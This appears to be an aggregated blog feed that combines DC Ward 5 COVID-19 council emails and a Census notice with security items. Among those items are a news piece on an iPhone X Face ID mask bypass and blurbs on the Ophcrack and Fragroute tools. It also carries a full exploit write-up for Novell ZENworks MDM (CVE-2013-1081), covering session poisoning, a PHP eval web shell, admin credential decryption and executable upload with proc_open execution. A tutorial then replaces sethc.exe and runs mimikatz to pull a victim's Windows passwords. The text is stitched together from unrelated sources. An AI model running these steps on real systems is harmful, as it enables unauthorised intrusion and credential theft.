Thursday 30 April 2020

[WardFive] TODAY at 4pm: Virtual Conversation on Supporting Students during COVID-19 with CM McDuffie

Join Councilmember McDuffie today, Thursday, April 30, at 4pm on Facebook live as he hosts a conversation on distance learning and how to support our students during COVID-19. Councilmember McDuffie will be joined by:

Kemi Husbands

Principal, Langdon Elementary School

Maquita Alexander

Executive Director Washington Yu Ying PCS

Amy Winkle, LICSW

Rising Sun Therapy, LLC

Yuvay Ferguson

DC Parent

Facebook event: https://www.facebook.com/events/536016850641080

Tune in at 4pm: https://www.facebook.com/KenyanRMcDuffie/

(You do not need to be on facebook to watch, just click this link at 4pm today)

---

Nolan Treadway

Communications Director

Office of Ward 5 Councilmember Kenyan R. McDuffie

Chairman Pro Tempore

Chair, Committee on Business and Economic Development

1350 Pennsylvania Avenue, NW, Suite 506

Washington, DC 20004

Main: 202-724-8028

Desk: 202-724-8918

Cell: 202-445-0361

ntreadway@dccouncil.us

www.KenyanMcDuffieWard5.com

Wednesday 29 April 2020

cheat_training_group Folding kayak

--
laks@calleva.org
calleva.org/liquid-adventures-kayak
---
You received this message because you are subscribed to the Google Groups "Cheat Training" group.
To unsubscribe from this group and stop receiving emails from it, send an email to upper_yough_training_group+unsubscribe@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/upper_yough_training_group/47E2871E-79C9-4F7B-9843-EF689CE8CAFF%40aol.com.

Sunday 26 April 2020

[WardFive] 2020 Census - Household Pulse Survey: Measuring Social and Economic Impacts during the COVID-19 Pandemic

https://www2.census.gov/data/experimental-data-products/household-pulse-survey/household-pulse-survey-questionnaire.pdf?#

https://my2020census.gov/

Household Pulse Survey: Measuring Social and Economic Impacts during the COVID-19 Pandemic

What is the Household Pulse Survey?

The U.S. Census Bureau, in collaboration with five federal agencies, is in a unique position to produce data on the social and economic effects of COVID-19 on American households. The Household Pulse Survey is designed to deploy quickly and efficiently, collecting data on a range of ways in which people’s lives have been impacted by the pandemic. Data will be disseminated in near real-time to inform federal and state response and recovery planning.

If you have been invited to participate in the survey, you may find more information here.

Household Pulse Survey Questionnaire

What information will the Household Pulse Survey collect?

The Household Pulse Survey will ask individuals about their experiences in terms of employment status, spending patterns, food security, housing, physical and mental health, access to health care, and educational disruption. The questionnaire is a result of collaboration between the U.S. Census Bureau and the USDA Economic Research Service (ERS), the Bureau of Labor Statistics (BLS), the National Center for Health Statistics (NCHS), the National Center for Education Statistics (NCES), and the Department of Housing and Urban Development (HUD).

The data collected will enable the Census Bureau to produce statistics at a state level and for the 15 largest Metropolitan Statistical Areas (MSAs). The survey also is designed to be longitudinal: data will provide insights with regard to how household experiences changed during the pandemic.

When will Data be Made Available from the Household Pulse Survey?

Data collection for the Household Pulse Survey will begin on April 23, 2020. The Census Bureau will collect data for 90 days, and release data on a weekly basis. (For the first release, the Census Bureau anticipates it will take two weeks after the first week of data collection to prepare and weight the data; subsequent releases will then be made on a weekly basis.)

How is the Household Pulse Survey Different from Other Surveys Conducted by the Census Bureau?

The Census Bureau and its federal statistical partners are considered the preeminent source of the nation's most important benchmark surveys. Many of these surveys have been ongoing for more than 80 years and provide valuable insight on social and economic trends.

The production of these benchmark surveys is by nature a highly deliberative process. While efforts are underway to introduce COVID-19 questions into these surveys, that process can take months, sometimes years, before data are made available.

The approach for the Household Pulse Survey is different: It is designed to be a short-turnaround instrument that will provide valuable data to aid in the post-pandemic recovery. The Census Bureau is fielding the Household Pulse Survey as a demonstration project that is part of the Experimental Data Product series.

Robert Vinson Brannum

Advisory Neighborhood Commissioner

President Emeritus, DC Federation of Civic Associations, Inc.

APPLE IPHONE X FACE ID CAN BE HACKED WITH SILICON MASK

Just a week after Apple released its brand new iPhone X on November 3, a team of researchers has claimed to successfully hack Apple's Face ID facial recognition technology with a mask that costs less than $150. They said Apple iPhone x face id can be hacked with silicon mask easily.

apple iPhone x face id hacked
Yes, Apple's "ultra-secure" Face ID security for the iPhone X is not as secure as the company claimed during its launch event in September this year.

"Apple engineering teams have even gone and worked with professional mask makers and makeup artists in Hollywood to protect against these attempts to beat Face ID," Apple's senior VP of worldwide marketing Phil Schiller said about Face ID system during the event.

"These are actual masks used by the engineering team to train the neural network to protect against them in Face ID."

However, the bad news is that researchers from Vietnamese cybersecurity firm Bkav were able to unlock the iPhone X using a mask.

Yes, Bkav researchers have a better option than holding it up to your face while you sleep. Bkav researchers re-created the owner's face through a combination of 3D printed mask, makeup, and 2D images with some "special processing done on the cheeks and around the face, where there are large skin areas" and the nose is created from silicone.

The researchers have also published a proof-of-concept video, showing the brand-new iPhone X first being unlocked using the specially constructed mask, and then using the Bkav researcher's face, in just one go.

"Many people in the world have tried different kinds of masks but all failed. It is because we understand how AI of Face ID works and how to bypass it," an FAQ on the Bkav website said.

"You can try it out with your own iPhone X, the phone shall recognize you even when you cover a half of your face. It means the recognition mechanism is not as strict as you think, Apple seems to rely too much on Face ID's AI. We just need a half face to create the mask. It was even simpler than we ourselves had thought."

Researchers explain that their "proof-of-concept" demo took about five days after they got iPhone X on November 5th. They also said the demo was performed against one of their team member's face without training iPhone X to recognize any components of the mask.

"We used a popular 3D printer. The nose was made by a handmade artist. We use 2D printing for other parts (similar to how we tricked Face Recognition 9 years ago). The skin was also hand-made to trick Apple's AI," the firm said.

The security firm said it cost the company around $150 for parts (which did not include a 3D printer), though it did not specify how many attempts its researchers took them to bypass the security of Apple's Face ID.

It should be noted that creating such a mask to unlock someone's iPhone is a time-consuming process and it is not possible to hack into a random person's iPhone.

However, if you prefer privacy and security over convenience, we highly recommend you to use a passcode instead of fingerprint or Face ID to unlock your phone.

Continue reading

Ophcrack

" Ophcrack is an open source (GPL license) program that cracks Windows LM hashes using rainbow tables. The program includes the ability to import the hashes from a variety of formats, including dumping directly from the SAM files of Windows. There is also a Live CD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. Rainbow tables for LM hashes of alphanumeric passwords are provided for free by the developers. These tables can crack 99.9% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. Larger rainbow tables (for LM hashes of passwords with all printable characters, including symbols and space) are available for purchase from Objectif Securité. Starting with version 2.3, Ophcrack also cracks NT hashes. This is necessary if generation of the LM hash is disabled (this is default on Windows Vista), or if the password is longer than 14 characters (in which case the LM hash is not stored)." read more...

Website: http://ophcrack.sourceforge.net

Saturday 25 April 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.

Time to wake up - https://www.youtube.com/watch?v=vQObWW06VAM

For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:

Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]

I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.

The actual CVE details are as follows:

"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."

After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:

POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=

Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:

<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== '' && $Language != $_SESSION["language"])
{
//check for validity
if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
{
$_SESSION["language"] = $Language;
}
}

if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);

In English:

Check if the "language" parameter is passed in on the request
If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
If the session variable "language" is set, include it into the page
Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:

$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;

The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:

egrep -R '\$_SESSION\[.*\] =' ./

This pulled up a ton of results, including the following:

/desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];

Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey'] > 0)
{

} else
{
$_SESSION['$error'] = LOGIN_FAILED_TEXT;
header('Location: index.php');
}

The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)

This will create a session file named "sess_payload" that we can include, the file contains the following:

user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";

Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:

return mdm_DecryptData($result[0]['Password']);

Ends up it is magic – so I sent the following PHP to be executed on the server -

$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);

Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_creds.rb

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:

$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));

This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.

After we have uploaded the file we can then carry out another request to execute what has been uploaded:

$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
$output=explode("\\n",+stream_get_contents($pipes[1]));
fclose($pipes[1]);
proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};

The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:

https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_lfi.rb

Update: Metasploit modules are now available as part of metasploit.

Friday 24 April 2020

[WardFive] CM McDuffie on Today's Updated District Budget Forecast

From: <kmcduffie@dccouncil.us>
Reply-To: <kmcduffie@DCCOUNCIL.US>
Date: Friday, April 24, 2020 at 5:12 PM
To: <ntreadway@DCCOUNCIL.US>
Subject: April 24 Coronavirus Response - Updated District Budget Forecast

Below are today's updates on the District's response to the coronavirus pandemic. For the latest and most comprehensive information always visit http://coronavirus.dc.gov.

DC's Chief Financial Officer Provides Budget Forecast Update
Small Business Spotlight: Roaming Rooster

DC's Chief Financial Officer Provides Budget Forecast Update

Today, District of Columbia Chief Financial Officer Jeffrey DeWitt provided an updated financial forecast for the District to the Mayor and Council. You can view the full presentation here and read Councilmember McDuffie's statement below.

"District of Columbia Chief Financial Officer Jeffrey DeWitt just provided the Mayor and Council with an updated financial forecast and now projects a budget shortfall of $722 million in the current fiscal year, and additional downward revisions of $774 million, $606 million, and $568 million over the next three years. Based on all the numbers, the CFO today indicated that we are now in a recession.

While that is certainly not welcome news, we all know that this pandemic has had a devastating impact on our economy. We are not alone among cities in the United States facing these challenges, but we are well-positioned compared to some of our counterparts. We entered this crisis with a full rainy day fund, a well-funded unemployment insurance fund, and our employee pension obligations fully funded.

I believe the city should be able to navigate this crisis in both the long and short term with responsible policies and spending. However, there will be difficult decisions in the years and budgets ahead. The impact on District small businesses and workers is profound, but I remain steadfast and optimistic that the future of our city is bright."

Small Business Spotlight: Roaming Rooster

Roaming Rooster on Bladensburg Road NE continues to serve delicious chicken to the public for carry out and delivery in the midst of the public health emergency. They have also stepped up and provided meals to health care workers at Providence Urgent Care, Howard University Hospital, and United Medical Center. The restaurant interior is closed for social distancing but you can simply place your order online and make a contact-less pickup. Order ahead via their website, GrubHub, Postmates, or Uber Eats.

---

Nolan Treadway

Communications Director

Office of Ward 5 Councilmember Kenyan R. McDuffie

Chairman Pro Tempore

Chair, Committee on Business and Economic Development

1350 Pennsylvania Avenue, NW, Suite 506

Washington, DC 20004

Main: 202-724-8028

Desk: 202-724-8918

Cell: 202-445-0361

ntreadway@dccouncil.us

www.KenyanMcDuffieWard5.com

Thursday 23 April 2020

Cracking Windows 8/8.1 Passwords With Mimikatz

You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...

Requirements:

A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
Mimikatz (Download | Blog)
Physical Access to victim's machine
A Working Brain in that Big Head (Download Here)

Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this

9. Now navigate to your usb drive in my case its drive G:

10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)

11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)

That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

Continue reading

Wednesday 22 April 2020

Fragroute

"fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behaviour. This tool was written in good faith to aid in the testing of network intrusion detection systems, firewalls, and basic TCP/IP stack behaviour." read more...

Website: http://monkey.org/~dugsong/fragroute

Related word

Laks Advanced , Ward Five & Home Based Business